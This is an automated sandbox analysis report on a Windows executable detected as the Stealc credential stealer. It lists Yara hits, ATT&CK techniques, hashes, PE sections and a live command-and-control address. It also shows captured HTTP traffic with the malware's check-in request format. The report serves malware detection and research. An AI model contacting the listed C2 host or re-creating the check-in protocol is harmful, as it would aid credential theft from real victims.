Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_001A7D20
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_001A7B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_001A79E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_001A7BC0

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2018399242.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1360, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2018399242.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1360, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (numbers in parentheses are the report's per-technique signature counts):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Native API (12) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (334) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Antivirus detection (submitted sample):

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| file.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
| file.exe | 100% | Joe Sandbox ML | | |

No Antivirus matches
No Antivirus matches
No Antivirus matches

URL reputation:

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe | |

No contacted domains info
Contacted URLs:

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://185.215.113.206/6c4adf523b719729.php | true | | unknown |
| http://185.215.113.206/ | true | | unknown |

URLs from memory and binary strings:

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://185.215.113.206/6c4adf523b719729.phps | file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://185.215.113.206 | file.exe, 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown |
| http://185.215.113.206/l | file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://185.215.113.206/6c4adf523b719729.php; | file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://185.215.113.206/6c4adf523b719729.phpk | file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://185.215.113.206/I | file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://185.215.113.206/6c4adf523b719729.php& | file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
Contacted IPs:

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true |
General Information:

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1546643
Start date and time: 2024-11-01 10:56:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 131
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe

No simulations
                                   Match            Associated Sample Name / URL  SHA 256   Detection  Threat Name  Link  Context
                                   185.215.113.206  file.exe  Get hash  malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc  Browse
                                                    • 185.215.113.206/6c4adf523b719729.php
                                                    file.exe  Get hash  malicious  Stealc  Browse
                                                    • 185.215.113.206/6c4adf523b719729.php
                                                    file.exe  Get hash  malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc  Browse
                                                    • 185.215.113.206/6c4adf523b719729.php
                                                    file.exe  Get hash  malicious  Stealc  Browse
                                                    • 185.215.113.206/6c4adf523b719729.php
                                                    file.exe  Get hash  malicious  Stealc, Vidar  Browse
                                                    • 185.215.113.206/6c4adf523b719729.php
                                                    file.exe  Get hash  malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc  Browse
                                                    • 185.215.113.206/6c4adf523b719729.php
                                                    file.exe  Get hash  malicious  Stealc  Browse
                                                    • 185.215.113.206/6c4adf523b719729.php
                                                    file.exe  Get hash  malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc  Browse
                                                    • 185.215.113.206/6c4adf523b719729.php
                                                    file.exe  Get hash  malicious  Stealc, Vidar  Browse
                                                    • 185.215.113.206/6c4adf523b719729.php
                                                    file.exe  Get hash  malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc  Browse
                                                    • 185.215.113.206/6c4adf523b719729.php
                                  No context
                                   Match                   Associated Sample Name / URL  SHA 256   Detection  Threat Name  Link  Context
                                   WHOLESALECONNECTIONSNL  file.exe  Get hash  malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc  Browse
                                                           • 185.215.113.206
                                                           file.exe  Get hash  malicious  Stealc  Browse
                                                           • 185.215.113.206
                                                           file.exe  Get hash  malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc  Browse
                                                           • 185.215.113.16
                                                           file.exe  Get hash  malicious  Stealc  Browse
                                                           • 185.215.113.206
                                                           file.exe  Get hash  malicious  Stealc, Vidar  Browse
                                                           • 185.215.113.206
                                                           file.exe  Get hash  malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc  Browse
                                                           • 185.215.113.16
                                                           file.exe  Get hash  malicious  Stealc  Browse
                                                           • 185.215.113.206
                                                           file.exe  Get hash  malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc  Browse
                                                           • 185.215.113.206
                                                           file.exe  Get hash  malicious  Stealc, Vidar  Browse
                                                           • 185.215.113.206
                                                           file.exe  Get hash  malicious  LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar  Browse
                                                           • 185.215.113.17
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.958325842579587
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:2'134'016 bytes
                                  MD5:fbc1650a9c7f6f7c01aa9c1bd71cf2cb
                                  SHA1:02a2bbc7edf8712575e11ca3a5b2fb38255b6851
                                  SHA256:2222b91f09e31a309de68a2d7f66ef1ba8588d5fd0c92c6b15ca4d57622d509f
                                  SHA512:58558bdc6385a1991c315a5c46b296e9c77ef8eb689f6f32f6a3270d0e2c19576bec877441c73697843f0a8d33b6b3c3deb7eddcc0491c5f4dedab2e5eba97d2
                                  SSDEEP:49152:8fc9iSlMYFmn4/S0e4VJOfNcsNTPN5eLIzY:8ffSlMOZRbRsNpPY
                                  TLSH:63A533BB5B23F028C612B9BD84C4B2C3E5F4541404805AB8D57995E7ADBFAFC3422DDA
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0xb2b000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
                                   Name                                  Virtual Address  Virtual Size  Is in Section
                                   IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_IMPORT          0x2e9050         0x64          .idata
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_BASERELOC       0x2e91f8         0x8           .idata
                                   IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                   Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy             Characteristics
                                             0x1000           0x2e7000      0x67600   5f601062f990e1a7adb0e51807afdaa9  unknown   unknown              unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .rsrc     0x2e8000         0x1000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty                 0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .idata    0x2e9000         0x1000        0x200     049071433b9f7c843453337b0fd53002  False     0.1328125            data                  0.8946074494647072  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                             0x2ea000         0x2a2000      0x200     bfebc900ee639e8936d0384618c4726e  unknown   unknown              unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   jfbmubxy  0x58c000         0x19e000      0x19e000  6795041e7f2dc1e9af7fa1cbef482dd2  False     0.9951572878925121   data                  7.954398725393829   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   qpyydaeu  0x72a000         0x1000        0x400     ecaaf8b9e713db4d088a1899474ebf61  False     0.70703125           data                  5.715370383063398   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .taggant  0x72b000         0x3000        0x2200    8d305e55fccd7aa69356d2a0100ad1f3  False     0.05847886029411765  DOS executable (COM)  0.7759250538043629  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   DLL           Import
                                   kernel32.dll  lstrcpy
                                   Timestamp                        SID      Signature                                        Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
                                   2024-11-01T10:56:57.782133+0100  2044243  ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in  1         192.168.2.5  49704        185.215.113.206  80         TCP
                                   Timestamp                           Source Port  Dest Port  Source IP        Dest IP
                                   Nov 1, 2024 10:56:56.550436020 CET  49704        80         192.168.2.5      185.215.113.206
                                   Nov 1, 2024 10:56:56.555615902 CET  80           49704      185.215.113.206  192.168.2.5
                                   Nov 1, 2024 10:56:56.555736065 CET  49704        80         192.168.2.5      185.215.113.206
                                   Nov 1, 2024 10:56:56.555999041 CET  49704        80         192.168.2.5      185.215.113.206
                                   Nov 1, 2024 10:56:56.560856104 CET  80           49704      185.215.113.206  192.168.2.5
                                   Nov 1, 2024 10:56:57.474788904 CET  80           49704      185.215.113.206  192.168.2.5
                                   Nov 1, 2024 10:56:57.474996090 CET  49704        80         192.168.2.5      185.215.113.206
                                   Nov 1, 2024 10:56:57.479866028 CET  49704        80         192.168.2.5      185.215.113.206
                                   Nov 1, 2024 10:56:57.485733986 CET  80           49704      185.215.113.206  192.168.2.5
                                   Nov 1, 2024 10:56:57.781995058 CET  80           49704      185.215.113.206  192.168.2.5
                                   Nov 1, 2024 10:56:57.782133102 CET  49704        80         192.168.2.5      185.215.113.206
                                   Nov 1, 2024 10:57:00.572268009 CET  49704        80         192.168.2.5      185.215.113.206
                                  • 185.215.113.206
                                   Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                   0           192.168.2.5  49704        185.215.113.206  80                1360  C:\Users\user\Desktop\file.exe
                                   Timestamp                           Bytes transferred  Direction  Data
                                   Nov 1, 2024 10:56:56.555999041 CET  90                 OUT        GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Nov 1, 2024 10:56:57.474788904 CET  203                IN         HTTP/1.1 200 OK
                                  Date: Fri, 01 Nov 2024 09:56:57 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                   Nov 1, 2024 10:56:57.479866028 CET  413                OUT        POST /6c4adf523b719729.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 30 31 38 41 37 39 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a
                                  Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="hwid"F9C8018A799D1524750037------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build"tale------IIEBGIDAAFHIJJJJEGCG--
                                   Nov 1, 2024 10:56:57.781995058 CET  210                IN         HTTP/1.1 200 OK
                                  Date: Fri, 01 Nov 2024 09:56:57 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Target ID:0
                                  Start time:05:56:53
                                  Start date:01/11/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x190000
                                  File size:2'134'016 bytes
                                  MD5 hash:FBC1650A9C7F6F7C01AA9C1BD71CF2CB
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2018399242.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                    Execution Graph

                                    Execution Coverage:2.9%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:2.9%
                                    Total number of Nodes:1327
                                    Total number of Limit Nodes:24
192862 38082->38083 38084 194610 2 API calls 38083->38084 38085 19287b 38084->38085 38086 194610 2 API calls 38085->38086 38087 192894 38086->38087 38088 194610 2 API calls 38087->38088 38089 1928ad 38088->38089 38090 194610 2 API calls 38089->38090 38091 1928c6 38090->38091 38092 194610 2 API calls 38091->38092 38093 1928df 38092->38093 38094 194610 2 API calls 38093->38094 38095 1928f8 38094->38095 38096 194610 2 API calls 38095->38096 38097 192911 38096->38097 38098 194610 2 API calls 38097->38098 38099 19292a 38098->38099 38100 194610 2 API calls 38099->38100 38101 192943 38100->38101 38102 194610 2 API calls 38101->38102 38103 19295c 38102->38103 38104 194610 2 API calls 38103->38104 38105 192975 38104->38105 38106 194610 2 API calls 38105->38106 38107 19298e 38106->38107 38108 194610 2 API calls 38107->38108 38109 1929a7 38108->38109 38110 194610 2 API calls 38109->38110 38111 1929c0 38110->38111 38112 194610 2 API calls 38111->38112 38113 1929d9 38112->38113 38114 194610 2 API calls 38113->38114 38115 1929f2 38114->38115 38116 194610 2 API calls 38115->38116 38117 192a0b 38116->38117 38118 194610 2 API calls 38117->38118 38119 192a24 38118->38119 38120 194610 2 API calls 38119->38120 38121 192a3d 38120->38121 38122 194610 2 API calls 38121->38122 38123 192a56 38122->38123 38124 194610 2 API calls 38123->38124 38125 192a6f 38124->38125 38126 194610 2 API calls 38125->38126 38127 192a88 38126->38127 38128 194610 2 API calls 38127->38128 38129 192aa1 38128->38129 38130 194610 2 API calls 38129->38130 38131 192aba 38130->38131 38132 194610 2 API calls 38131->38132 38133 192ad3 38132->38133 38134 194610 2 API calls 38133->38134 38135 192aec 38134->38135 38136 194610 2 API calls 38135->38136 38137 192b05 38136->38137 38138 194610 2 API calls 38137->38138 38139 192b1e 38138->38139 38140 194610 2 API calls 38139->38140 38141 192b37 38140->38141 38142 194610 2 API calls 38141->38142 38143 192b50 38142->38143 38144 194610 2 API calls 38143->38144 38145 192b69 
38144->38145 38146 194610 2 API calls 38145->38146 38147 192b82 38146->38147 38148 194610 2 API calls 38147->38148 38149 192b9b 38148->38149 38150 194610 2 API calls 38149->38150 38151 192bb4 38150->38151 38152 194610 2 API calls 38151->38152 38153 192bcd 38152->38153 38154 194610 2 API calls 38153->38154 38155 192be6 38154->38155 38156 194610 2 API calls 38155->38156 38157 192bff 38156->38157 38158 194610 2 API calls 38157->38158 38159 192c18 38158->38159 38160 194610 2 API calls 38159->38160 38161 192c31 38160->38161 38162 194610 2 API calls 38161->38162 38163 192c4a 38162->38163 38164 194610 2 API calls 38163->38164 38165 192c63 38164->38165 38166 194610 2 API calls 38165->38166 38167 192c7c 38166->38167 38168 194610 2 API calls 38167->38168 38169 192c95 38168->38169 38170 194610 2 API calls 38169->38170 38171 192cae 38170->38171 38172 194610 2 API calls 38171->38172 38173 192cc7 38172->38173 38174 194610 2 API calls 38173->38174 38175 192ce0 38174->38175 38176 194610 2 API calls 38175->38176 38177 192cf9 38176->38177 38178 194610 2 API calls 38177->38178 38179 192d12 38178->38179 38180 194610 2 API calls 38179->38180 38181 192d2b 38180->38181 38182 194610 2 API calls 38181->38182 38183 192d44 38182->38183 38184 194610 2 API calls 38183->38184 38185 192d5d 38184->38185 38186 194610 2 API calls 38185->38186 38187 192d76 38186->38187 38188 194610 2 API calls 38187->38188 38189 192d8f 38188->38189 38190 194610 2 API calls 38189->38190 38191 192da8 38190->38191 38192 194610 2 API calls 38191->38192 38193 192dc1 38192->38193 38194 194610 2 API calls 38193->38194 38195 192dda 38194->38195 38196 194610 2 API calls 38195->38196 38197 192df3 38196->38197 38198 194610 2 API calls 38197->38198 38199 192e0c 38198->38199 38200 194610 2 API calls 38199->38200 38201 192e25 38200->38201 38202 194610 2 API calls 38201->38202 38203 192e3e 38202->38203 38204 194610 2 API calls 38203->38204 38205 192e57 38204->38205 38206 194610 2 API calls 38205->38206 38207 192e70 38206->38207 
38208 194610 2 API calls 38207->38208 38209 192e89 38208->38209 38210 194610 2 API calls 38209->38210 38211 192ea2 38210->38211 38212 194610 2 API calls 38211->38212 38213 192ebb 38212->38213 38214 194610 2 API calls 38213->38214 38215 192ed4 38214->38215 38216 194610 2 API calls 38215->38216 38217 192eed 38216->38217 38218 194610 2 API calls 38217->38218 38219 192f06 38218->38219 38220 194610 2 API calls 38219->38220 38221 192f1f 38220->38221 38222 194610 2 API calls 38221->38222 38223 192f38 38222->38223 38224 194610 2 API calls 38223->38224 38225 192f51 38224->38225 38226 194610 2 API calls 38225->38226 38227 192f6a 38226->38227 38228 194610 2 API calls 38227->38228 38229 192f83 38228->38229 38230 194610 2 API calls 38229->38230 38231 192f9c 38230->38231 38232 194610 2 API calls 38231->38232 38233 192fb5 38232->38233 38234 194610 2 API calls 38233->38234 38235 192fce 38234->38235 38236 194610 2 API calls 38235->38236 38237 192fe7 38236->38237 38238 194610 2 API calls 38237->38238 38239 193000 38238->38239 38240 194610 2 API calls 38239->38240 38241 193019 38240->38241 38242 194610 2 API calls 38241->38242 38243 193032 38242->38243 38244 194610 2 API calls 38243->38244 38245 19304b 38244->38245 38246 194610 2 API calls 38245->38246 38247 193064 38246->38247 38248 194610 2 API calls 38247->38248 38249 19307d 38248->38249 38250 194610 2 API calls 38249->38250 38251 193096 38250->38251 38252 194610 2 API calls 38251->38252 38253 1930af 38252->38253 38254 194610 2 API calls 38253->38254 38255 1930c8 38254->38255 38256 194610 2 API calls 38255->38256 38257 1930e1 38256->38257 38258 194610 2 API calls 38257->38258 38259 1930fa 38258->38259 38260 194610 2 API calls 38259->38260 38261 193113 38260->38261 38262 194610 2 API calls 38261->38262 38263 19312c 38262->38263 38264 194610 2 API calls 38263->38264 38265 193145 38264->38265 38266 194610 2 API calls 38265->38266 38267 19315e 38266->38267 38268 194610 2 API calls 38267->38268 38269 193177 38268->38269 38270 194610 2 
API calls 38269->38270 38271 193190 38270->38271 38272 194610 2 API calls 38271->38272 38273 1931a9 38272->38273 38274 194610 2 API calls 38273->38274 38275 1931c2 38274->38275 38276 194610 2 API calls 38275->38276 38277 1931db 38276->38277 38278 194610 2 API calls 38277->38278 38279 1931f4 38278->38279 38280 194610 2 API calls 38279->38280 38281 19320d 38280->38281 38282 194610 2 API calls 38281->38282 38283 193226 38282->38283 38284 194610 2 API calls 38283->38284 38285 19323f 38284->38285 38286 194610 2 API calls 38285->38286 38287 193258 38286->38287 38288 194610 2 API calls 38287->38288 38289 193271 38288->38289 38290 194610 2 API calls 38289->38290 38291 19328a 38290->38291 38292 194610 2 API calls 38291->38292 38293 1932a3 38292->38293 38294 194610 2 API calls 38293->38294 38295 1932bc 38294->38295 38296 194610 2 API calls 38295->38296 38297 1932d5 38296->38297 38298 194610 2 API calls 38297->38298 38299 1932ee 38298->38299 38300 194610 2 API calls 38299->38300 38301 193307 38300->38301 38302 194610 2 API calls 38301->38302 38303 193320 38302->38303 38304 194610 2 API calls 38303->38304 38305 193339 38304->38305 38306 194610 2 API calls 38305->38306 38307 193352 38306->38307 38308 194610 2 API calls 38307->38308 38309 19336b 38308->38309 38310 194610 2 API calls 38309->38310 38311 193384 38310->38311 38312 194610 2 API calls 38311->38312 38313 19339d 38312->38313 38314 194610 2 API calls 38313->38314 38315 1933b6 38314->38315 38316 194610 2 API calls 38315->38316 38317 1933cf 38316->38317 38318 194610 2 API calls 38317->38318 38319 1933e8 38318->38319 38320 194610 2 API calls 38319->38320 38321 193401 38320->38321 38322 194610 2 API calls 38321->38322 38323 19341a 38322->38323 38324 194610 2 API calls 38323->38324 38325 193433 38324->38325 38326 194610 2 API calls 38325->38326 38327 19344c 38326->38327 38328 194610 2 API calls 38327->38328 38329 193465 38328->38329 38330 194610 2 API calls 38329->38330 38331 19347e 38330->38331 38332 194610 2 API calls 
